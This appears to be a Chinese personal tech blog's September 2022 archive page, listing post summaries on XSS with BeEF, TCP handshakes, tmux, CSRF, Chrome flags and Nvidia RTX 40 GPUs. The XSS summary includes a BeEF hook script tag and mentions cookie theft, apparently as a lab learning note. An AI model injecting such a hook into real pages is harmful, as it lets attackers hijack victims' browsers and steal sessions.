09 2022 档案

摘要:xss 同源策略 js 外链不受到“同源策略”影响 berff-xss beef盗取cookie beef-xss(需要手动为kali服务器安装此命令) <script src="http://127.0.0.1:3000/hook.js"></script> 进入BEEF后我们先点击 Comman 阅读全文
posted @ 2022-09-22 15:11 Cong0ks 阅读(214) 评论(0) 推荐(0) 编辑
摘要:英伟达RTX 40系显卡和新一代Ada Lovelace 架构发布,新架构采用台积电4N工艺,相比较上一代实现了性能翻倍,同时支持全新光线追踪技术。 RTX 40系列的主要创新提升有: 1. 流式多处理器(SM) 着色器能力高达83TFlops(83万亿次运算每秒),吞吐量超过上一代产品的2倍。 2 阅读全文
posted @ 2022-09-21 09:34 Cong0ks 阅读(216) 评论(0) 推荐(0) 编辑
摘要:chrome://flags 搜索 audio 阅读全文
posted @ 2022-09-21 09:05 Cong0ks 阅读(48) 评论(0) 推荐(0) 编辑
摘要:三次握手过程: TCP(Transmission Control Protocol,传输控制协议)是面向连接的协议,也就是说,在收发数据前,必须和对方建立可靠的连接。一个TCP连接必须要经过三次“对话”才能建立起来. 第一次握手:客户端A 将同步标志位SYN置为1(SYN为1就表示要建立连接,连接成 阅读全文
posted @ 2022-09-14 10:09 Cong0ks 阅读(42) 评论(0) 推荐(0) 编辑
摘要:安装 yum install tmux # Redhat apt-get install tmux # Ubuntu brew install tmux # MAC 常用参数 # 查看 tmux ls 查看当前会话数 PS: 这里的3表示,这个会话中有3个子会话,再会话中切换子会话,按 Ctrl-B 阅读全文
posted @ 2022-09-13 10:21 Cong0ks 阅读(815) 评论(0) 推荐(0) 编辑
摘要:CSRF ,全称 Cross-site request forgery ,翻译过来就是跨站请求伪造(客户端),是指利用受害者尚未失效的身份认证信息(cookie 、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从 阅读全文
posted @ 2022-09-01 10:03 Cong0ks 阅读(71) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示